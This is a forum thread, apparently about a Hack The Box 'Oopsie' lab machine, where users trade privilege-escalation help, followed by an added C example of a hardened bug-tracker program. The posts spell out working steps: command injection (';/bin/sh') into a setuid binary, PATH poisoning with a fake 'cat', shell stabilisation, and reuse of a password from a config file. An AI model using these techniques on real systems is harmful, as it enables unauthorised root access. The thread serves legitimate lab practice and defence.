Oopsie Machine - Starting Point

I’m struggling to fully understand the shell upgrade code i.e.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

I get that SHELL sets the user's shell, but it seems to be running “script” and sending the output to null. From googling it seems that script is a kind of command recorder - unclear how this helps! Then I assume the Ctrl-Z is meant to background something (breaks the nc connection for me). stty switches off echoing, ok not sure how this helps.

reset and xterm resets the terminal session.

So I kinda get the individual commands, but can anyone explain how this works as a whole?
Thanks

is anyone else having an issue even getting a result from scans in startpoint…

@DaChef said:

There is also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

I appreciate your answer bro, may I know what made this code
export PATH=.:$PATH
echo '/bin/sh' > cat
chmod +x ./cat
not work in the first place?

@Ja4V8s28Ck said:

@DaChef said:

There is also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

I appreciate your answer bro, may I know what made this code
export PATH=.:$PATH
echo '/bin/sh' > cat
chmod +x ./cat
not work in the first place?

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo "/bin/sh" > cat
chmod +x cat
export PATH=/tmp:$PATH

The dot referencing on your current directory is wrong, you need to specify the exact path!
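
Seen from the defender's side, both tricks in this thread (typing ;/bin/sh at the prompt and planting a cat earlier in PATH) depend on a setuid program handing user input to a shell that looks cat up through PATH. The C below is an added example, not part of the thread and not bugtracker's source: it assumes that pattern and shows a hardened replacement; REPORT_DIR and the function names are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define REPORT_DIR "/srv/reports" /* hypothetical location, not from the thread */

/* Assumed weak pattern (for contrast only, not bugtracker's real source):
 *     snprintf(cmd, sizeof cmd, "cat " REPORT_DIR "/%s", id); system(cmd);
 * system() runs /bin/sh, which finds "cat" through the caller's PATH and
 * interprets shell metacharacters in id. The code below avoids both. */

/* Accept 1 to 9 decimal digits and nothing else; returns 1 if valid. */
int valid_bug_id(const char *id)
{
    size_t n = strlen(id);
    if (n == 0 || n > 9) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)id[i])) return 0;
    return 1;
}

/* Build the report path; returns 0 on success, -1 if id is rejected. */
int report_path(const char *id, char *out, size_t outlen)
{
    if (!valid_bug_id(id)) return -1;
    int n = snprintf(out, outlen, "%s/%s", REPORT_DIR, id);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Print the report with fopen/fread: no shell and no PATH lookup. */
int print_report(const char *id)
{
    char path[64], buf[4096];
    size_t got;
    if (report_path(id, path, sizeof path) != 0) return -1;
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    while ((got = fread(buf, 1, sizeof buf, f)) > 0)
        fwrite(buf, 1, got, stdout);
    fclose(f);
    return 0;
}

int main(void)
{
    char id[32];
    printf("Provide Bug ID: ");
    if (!fgets(id, sizeof id, stdin)) return 1;
    id[strcspn(id, "\n")] = '\0';
    return print_report(id) == 0 ? 0 : 1;
}
```

With the input restricted to digits and the file opened directly, neither the Bug ID prompt nor the caller's PATH influences which program runs.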

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo "/bin/sh" > cat
chmod +x cat
export PATH=/tmp:$PATH

@DaChef /tmp or any directory in which your current user has privileges to write.

@phamilton said:

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo "/bin/sh" > cat
chmod +x cat
export PATH=/tmp:$PATH

@DaChef /tmp or any directory in which your current user has privileges to write.

This worked for me. Thanks

Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

Right now bugtracker doesn’t have the setuid bit set, so the cat shell just gives you normal permission. Something to check if you are running everything else right and it just doesn’t work.

robert@oopsie:/tmp$ /usr/bin/bugtracker

: EV Bug Tracker :

Provide Bug ID: 1

$ whoami
robert
$ ls -al /usr/bin/bugtracker
-rwxr-xr-x 1 root root 8792 Apr 16 02:56 /usr/bin/bugtracker

However bugtracker.save still has the setuid bit so that can work:
$ ls -al /usr/bin/bugtracker.save
-rwsr-xr-x 1 root bugtracker 8792 Jan 25 10:14 /usr/bin/bugtracker.save
$ /usr/bin/bugtracker.save

: EV Bug Tracker :

Provide Bug ID: 1

whoami

root

I am able to do that but when I do cat /root/root.txt nothing happens

Never mind found it

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that r̶u̶n̶n̶i̶n̶g̶ misusing locate wasn’t turning anything up. You’ll find what you need if you keep looking.

@stevebytheway said:

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that running locate wasn’t turning anything up. You’ll find what you need if you keep looking.

Hey Steve yes I found it with the linux find command in the end: find / -name *.txt

I am in netcat and logged in as www-data
www-data@oopsie:
When I try to sudo robert I'm getting sorry try again?
I am using the password from the db.php file.
Am I missing something?

@ritorix How did you get into the robert user account? when I attempt su robert and enter the password from the db.php file, it gives me “su: Authentication failure”

Looks like someone may have changed the password? I tried the same process today and it worked!

@kp22cfc said:

I am able to do that but when I do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

@Jade86 said:
@kp22cfc said:

I am able to do that but when I do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

ah ok. got it, sorry lol

OK. Noob here. I got all the way to the end and it looks like I did everything right. I run /usr/bin/bugtracker and get the correct output but I still don’t have access to anything. i.e. /root. I’ve gone through the walkthrough many times for over 16 hours and I get the same result. Any advice?

Hi guys, need help… script below is not working for me.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

This is what is happening:
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xtermSHELL=/bin/bash script -q /dev/null
www-data@oopsie:/$ Ctrl-Z
Ctrl-Z: command not found
www-data@oopsie:/$ stty raw -echo
www-data@oopsie:/$ bash: fg: current: no such job
www-data@oopsie:/$ reset: unknown terminal type unknown
Terminal type?

help me understand what is happening here?